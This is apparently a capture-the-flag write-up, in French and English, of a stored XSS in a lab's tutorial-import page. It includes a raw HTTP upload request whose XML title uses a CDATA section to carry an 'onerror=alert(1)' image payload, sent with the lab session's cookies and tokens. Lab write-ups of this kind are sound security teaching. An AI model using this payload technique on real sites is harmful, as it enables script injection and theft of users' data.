Skip to content

XSS from Tutorial Title

Description

Write Up: Guillaume
Créateur: WOCSA
Difficulté: Inconnu

Enoncé

Cross-site scripting (XSS) vulnerabilities occur when:

_Untrusted data enters a web application, typically from a web request. _The web application dynamically generates a web page that contains this untrusted data. _During page generation, the application does not prevent the data from containing content that is executable by a web browser, such as JavaScript, HTML tags, HTML attributes, mouse events, Flash, ActiveX, etc. _A victim visits the generated web page through a web browser, which contains malicious script that was injected using the untrusted data. _Since the script comes from a web page that was sent by the web server, the victim's web browser executes the malicious script in the context of the web server's domain. _This effectively violates the intention of the web browser's same-origin policy, which states that scripts in one domain should not be able to access resources or run code in a different domain.

Solution détaillée

Exploitation

Create a new template on http://wg2d3m2w.3xploit.me/import_tutorial/ , then add a CDATA field that would be interpreted by xml, add a XSS on it and it would be render on the page

POC

Host: wg2d3m2w.3xploit.me
User-Agent: PENTEST-BSECURE
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: fr,fr-FR;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br
Referer: http://wg2d3m2w.3xploit.me/import_tutorial/
Content-Type: multipart/form-data; boundary=---------------------------425632754830607821922911679252
Content-Length: 1342
Origin: http://wg2d3m2w.3xploit.me
Connection: keep-alive
Cookie: logs="gASVQgAAAAAAAACMFWJsb2dfRElZLmxvZ3NfbWFuYWdlcpSMBExvZ3OUk5QpgZR9lCiMCHVzZXJuYW1llIwDVG9HlIwDbG9nlIh1Yi4="; csrftoken=dbLj5tn4iA38ZElYBwppgECwbD1QIWpy; jwt_token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ0b2tlbl90eXBlIjoiYWNjZXNzIiwiZXhwIjoxNzE0ODk1MDAyLCJpYXQiOjE3MTQ4MDg2MDIsImp0aSI6Ijg0Mjc2NWFlMTk4YzRhNWM5MWQxYWRlODgxNTMyMzA4IiwidXNlcl9pZCI6OX0.hq5DNxuKmZubSjUCyeGd0YOsk3kOkKHDNDaASGW4rVo
Upgrade-Insecure-Requests: 1
X-PwnFox-Color: green
Pragma: no-cache
Cache-Control: no-cache

-----------------------------425632754830607821922911679252
Content-Disposition: form-data; name="csrfmiddlewaretoken"

FIprmO4eMUtL3Oj855LWa51ExsASmuxmIJ0Ah7h8UkmJSiuWwr0bgzt0yVryUgMK
-----------------------------425632754830607821922911679252
Content-Disposition: form-data; name="file"; filename="sploi.xml"
Content-Type: text/xml

<tutorial>
    <title><![CDATA[<img src=x onerror=alert(1)>>]]></title>
    <text_contents>
    </text_contents>
    <picture_contents>
        <picture_content>
            <picture>example.jpg</picture>
        </picture_content>
        <picture_content>
            <picture>another_example.jpg</picture>
        </picture_content>
    </picture_contents>
</tutorial>

-----------------------------425632754830607821922911679252--

Risk

XSS can deface the site, DDOS via cookie bombing and steal user data

Remediation

Sanitize html from XML